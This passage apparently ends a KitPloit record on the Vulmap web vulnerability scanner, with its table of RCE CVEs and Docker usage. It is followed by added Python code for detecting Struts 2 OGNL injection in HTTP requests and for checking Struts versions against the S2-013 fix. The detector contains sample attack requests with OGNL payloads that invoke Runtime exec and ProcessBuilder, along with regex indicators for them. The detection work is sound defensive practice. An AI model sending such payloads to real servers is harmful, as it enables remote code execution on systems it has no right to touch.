| 6.x, 7.x, 8.x, drupalgeddon2 remote code execution |\n | Drupal | CVE-2018-7602 | Y | Y | < 7.59, < 8.5.3 (except 8.4.8) drupalgeddon2 rce |\n | Drupal | CVE-2019-6340 | Y | Y | < 8.6.10, drupal core restful remote code execution |\n | Jenkins | CVE-2017-1000353 | Y | N | <= 2.56, LTS <= 2.46.1, jenkins-ci remote code execution |\n | Jenkins | CVE-2018-1000861 | Y | Y | <= 2.153, LTS <= 2.138.3, remote code execution |\n | Nexus OSS/Pro | CVE-2019-7238 | Y | Y | 3.6.2 - 3.14.0, remote code execution vulnerability 
|\n | Nexus OSS/Pro | CVE-2020-10199 | Y | Y | 3.x <= 3.21.1, remote code execution vulnerability |\n | Oracle Weblogic | CVE-2014-4210 | Y | N | 10.0.2 - 10.3.6, weblogic ssrf vulnerability |\n | Oracle Weblogic | CVE-2017-3506 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.0-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2017-10271 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.1-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2018-2894 | Y | Y | 12.1.3.0, 12.2.1.2-3, deserialization any file upload |\n | Oracle Weblogic | CVE-2019-2725 | Y | Y | 10.3.6.0, 12.1.3.0, weblogic wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2019-2729 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3 wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2020-2551 | Y | N | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, wlscore deserialization rce |\n | Oracle Weblogic | CVE-2020-2555 | Y | Y | 3.7.1.17, 12.1.3.0.0, 12.2.1.3-4.0, t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-2883 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, iiop t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-14882 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0.0, console rce |\n | RedHat JBoss | CVE-2010-0738 | Y | Y | 4.2.0 - 4.3.0, jmx-console deserialization any files upload |\n | RedHat JBoss | CVE-2010-1428 | Y | Y | 4.2.0 - 4.3.0, web-console deserialization any files upload |\n | RedHat JBoss | CVE-2015-7501 | Y | Y | 5.x, 6.x, jmxinvokerservlet deserialization any file upload |\n | ThinkPHP | CVE-2019-9082 | Y | Y | < 3.2.4, thinkphp rememberme deserialization rce |\n | ThinkPHP | CVE-2018-20062 | Y | Y | <= 5.0.23, 5.1.31, thinkphp rememberme deserialization rce |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n \n\n \n\n\n### Docker \n \n \n docker build -t vulmap/vulmap .\n docker run --rm -ti vulmap/vulmap python vulmap.py -u https://www.example.com\n\n \n\n\n \n \n\n\n** [ Download Vulmap ](<https://github.com/zhzyker/vulmap> 
\"Download Vulmap\" ) **\n", "edition": 1, "modified": "2020-12-25T11:30:06", "published": "2020-12-25T11:30:06", "id": "KITPLOIT:5420210148456420402", "href": "http://www.kitploit.com/2020/12/vulmap-web-vulnerability-scanning-and.html", "title": "Vulmap - Web Vulnerability Scanning And Verification Tools", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
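Two payload shapes appear in the records above: the Nessus remote check for S2-013 places the OGNL expression in the URL path (percent-encoding `#` as `%23`), and the Wallarm post shows the later S2-045 form carried in the Content-Type header, proposing `%{(#_='multipart/form-data')` as a WAF signature. The following detection-side scanner applies those indicators to raw HTTP requests. It is an added example, not code from Tenable, Wallarm or the Struts project; the three sample requests are constructed for it from the payload forms quoted on this page, and the host name is made up.

```python
"""Indicator scan for OGNL injection attempts against Struts 2.

Added example (not Tenable's, Wallarm's or the Struts project's code).
Covers the S2-013/S2-014 expression placed in the URL path and the S2-045
expression placed in the Content-Type header. Sample requests below are
constructed; the host name is made up.
"""
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote

# Indicators are matched after percent-decoding the request target, so the
# %23 sent by the Nessus probe is seen as '#'. Header values are matched
# as-is, since they are not percent-encoded.
INDICATORS = [
    # ${...} or %{...} whose body starts an OGNL expression
    ("ognl-expression", re.compile(r"[$%]\{[^}]*[#@(]")),
    # attempts to switch off the OGNL sandbox
    ("member-access-bypass",
     re.compile(r"#_memberAccess|allowStaticMethodAccess|DEFAULT_MEMBER_ACCESS")),
    # process execution primitives used by the published payloads
    ("runtime-exec", re.compile(r"@java\.lang\.Runtime@|java\.lang\.ProcessBuilder")),
    # the literal prefix Wallarm proposes as a WAF signature for S2-045;
    # straight or curly quotes, since the post shows both
    ("s2-045-content-type",
     re.compile(r"%\{\(#_=['\u2018\u2019]multipart/form-data['\u2018\u2019]\)")),
]


def parse_request(raw: str) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP/1.1 request into (request-target, {header: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    _method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return target, headers


def scan_request(raw: str) -> List[Tuple[str, str]]:
    """Return (location, indicator) pairs for every OGNL sign in the request."""
    target, headers = parse_request(raw)
    fields = {"path": unquote(target), **headers}
    hits: List[Tuple[str, str]] = []
    for where, value in fields.items():
        for name, pattern in INDICATORS:
            if pattern.search(value):
                hits.append((where, name))
    return hits


def is_ognl_injection(raw: str) -> bool:
    """A request is flagged when any indicator fires anywhere in it."""
    return bool(scan_request(raw))


# Constructed samples. The first follows the S2-013 path form used by the
# Nessus plugin; the second follows the S2-045 Content-Type form from the
# Wallarm post (shortened, command part left out); the third is an
# ordinary Struts request that must not be flagged.
S2_013_REQUEST = (
    "GET /app/login/${%23context['xwork.MethodAccessor.denyMethodExecution']"
    "=!(%23_memberAccess['allowStaticMethodAccess']=true),"
    "(@java.lang.Runtime@getRuntime()).exec('id').waitFor()}.action HTTP/1.1\r\n"
    "Host: struts.example.internal\r\n\r\n"
)
S2_045_REQUEST = (
    "GET /valid-struts.action HTTP/1.1\r\n"
    "Host: struts.example.internal\r\n"
    "Content-Type: %{(#_='multipart/form-data')"
    ".(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
    ".(#p=new java.lang.ProcessBuilder(#cmds))}\r\n\r\n"
)
BENIGN_REQUEST = (
    "GET /app/login.action?user=alice&next=%2Fhome HTTP/1.1\r\n"
    "Host: struts.example.internal\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
)

if __name__ == "__main__":
    for label, req in (("S2-013", S2_013_REQUEST), ("S2-045", S2_045_REQUEST),
                       ("benign", BENIGN_REQUEST)):
        print(label, scan_request(req))
```

The location in each hit matters operationally: a `path` hit corresponds to the S2-013/S2-014 class, which a URL-only log (a typical access log) would show, while the S2-045 class lives entirely in a request header and is invisible unless the proxy or WAF logs headers.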
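The version-based Nessus plugin STRUTS_2_3_14_1.NASL above flags Struts 2.x from 2.0.0 up to (not including) 2.3.14.2 via vcf::check_version_and_report, after vcf::check_granularity demands at least three version segments. The same check in plain Python follows, as an added example that is not Tenable's code. It compares versions numerically rather than as strings, and takes the stricter reading of the granularity concern: a self-reported version that is only a prefix of the fixed release (such as "2.3.14", which could be 2.3.14.1 or 2.3.14.2) is reported as indeterminate instead of being counted on either side.

```python
"""Version-range check for Struts S2-013/S2-014 (fixed in 2.3.14.2).

Added example of the check the Nessus plugin performs; not Tenable's code.
Versions are compared segment by segment as integers, never as strings.
"""
from typing import Tuple

MIN_AFFECTED = (2, 0, 0)      # constraint min_version in the plugin
FIXED = (2, 3, 14, 2)         # first release carrying the fix


def parse_version(text: str) -> Tuple[int, ...]:
    """'2.3.14.2' -> (2, 3, 14, 2); anything non-numeric is rejected."""
    parts = text.strip().split(".")
    if not all(part.isdigit() for part in parts):
        raise ValueError(f"not a dotted numeric version: {text!r}")
    return tuple(int(part) for part in parts)


def _pad(version: Tuple[int, ...], width: int) -> Tuple[int, ...]:
    """Right-pad with zeros so (2, 3, 15) compares against (2, 3, 14, 2)."""
    return version + (0,) * (width - len(version))


def s2_013_status(text: str) -> str:
    """Classify a Struts version as vulnerable, fixed, not_affected or indeterminate."""
    version = parse_version(text)
    width = max(len(version), len(FIXED))
    # Granularity: a version that is only a prefix of the fixed release
    # (e.g. "2.3.14" or "2.3") cannot be placed on either side of the fix.
    if len(version) < len(FIXED) and version == FIXED[:len(version)]:
        return "indeterminate"
    if _pad(version, width) < _pad(MIN_AFFECTED, width):
        return "not_affected"    # Struts 1.x is a different code base
    if _pad(version, width) < _pad(FIXED, width):
        return "vulnerable"
    return "fixed"


if __name__ == "__main__":
    for v in ("2.3.1.1", "2.3.14", "2.3.14.1", "2.3.14.2", "2.3.14.10", "2.3.15"):
        print(v, s2_013_status(v))
```

The numeric comparison is the point worth keeping: as strings, "2.3.14.10" sorts before "2.3.14.2", so a naive scanner would report a patched 2.3.14.10 as vulnerable.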